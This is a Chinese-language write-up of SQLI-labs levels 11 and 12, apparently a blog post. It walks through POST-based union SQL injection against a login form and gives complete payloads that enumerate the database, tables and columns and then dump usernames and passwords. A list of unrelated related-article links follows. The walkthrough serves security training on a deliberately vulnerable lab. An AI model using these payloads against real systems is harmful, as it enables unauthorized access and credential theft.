SQLI-labs-第十一关和第十二关

目录

第十一关

1、判断注入点

2、判断字段值

3、爆库名

4、爆表名

5、爆字段名,以users表为例

6、爆值

第十二关

1、判断注入点

知识点:POST方式联合查询注入

第十一关

思路:

1、判断注入点

我们随便输入一个用户名和密码,使用Burpsuite抓包

抓到的包发送到repeater模块,查看正常回显是什么内容

这里有uname和passwd两个值,这两个都可能是注入点,我们都可以尝试一下

首先在uname的值加上单引号'

数据库语句报错,在passwd同理

说明这两个字段都存在注入点

判断注入点属于什么类型

输入uname=admin' and 1=1#

回显正常

输入uname=admin' and 1=2#

结果没有回显,说明这个注入点是单引号闭合错误的注入漏洞

2、判断字段值

使用order by 语句

uname=admin' order by 1#

从1开始尝试,试到3的时候报错,说明当前表的字段有2个

3、爆库名

做到这一步的时候,发现在uname这个点注入是没有回显信息的,只显示了正常的数据。需要在passwd这点注入才会回显,因为我们在最后加入了注释符#,会把passwd这个字段的值給注释掉,导致没有数据的正常回显。

使用联合查询语句 union

uname=admin&passwd=1' union select 1,database() #

4、爆表名

使用group_concat()函数

uname=admin&passwd=1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #

5、爆字段名,以users表为例

uname=admin&passwd=1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' #

6、爆值

使用concat_ws函数

uname=admin&passwd=1' union select 1,concat_ws(',',id,username,password) from security.users limit 0,1 #

通过修改limit 后面的值,就可以得到全部信息


第十二关

第十二关的思路跟第十一关的一样,只不过是双引号的闭合问题

1、判断注入点

接下来的步骤参考上面


这篇文章就写到这里,哪里有疑问或不足的欢迎指出!

相关推荐
LUCIAZZZ6 分钟前
HikariCP数据库连接池原理解析
java·jvm·数据库·spring·springboot·线程池·连接池
我在北京coding22 分钟前
300道GaussDB(WMS)题目及答案。
数据库·gaussdb
小Tomkk35 分钟前
阿里云 RDS mysql 5.7 怎么 添加白名单 并链接数据库
数据库·mysql·阿里云
明月醉窗台1 小时前
qt使用笔记二:main.cpp详解
数据库·笔记·qt
沉到海底去吧Go2 小时前
【图片自动识别改名】识别图片中的文字并批量改名的工具,根据文字对图片批量改名,基于QT和腾讯OCR识别的实现方案
数据库·qt·ocr·图片识别自动改名·图片区域识别改名·pdf识别改名
老纪的技术唠嗑局2 小时前
重剑无锋,大巧不工 —— OceanBase 中的 Nest Loop Join 使用技巧分享
数据库·sql
未来之窗软件服务3 小时前
JAVASCRIPT 前端数据库-V6--仙盟数据库架构-—-—仙盟创梦IDE
数据库·数据库架构·仙盟创梦ide·东方仙盟·东方仙盟数据库
一只爱撸猫的程序猿4 小时前
构建一个简单的智能文档问答系统实例
数据库·spring boot·aigc
nanzhuhe4 小时前
sql中group by使用场景
数据库·sql·数据挖掘
消失在人海中4 小时前
oracle sql 语句 优化方法
数据库·sql·oracle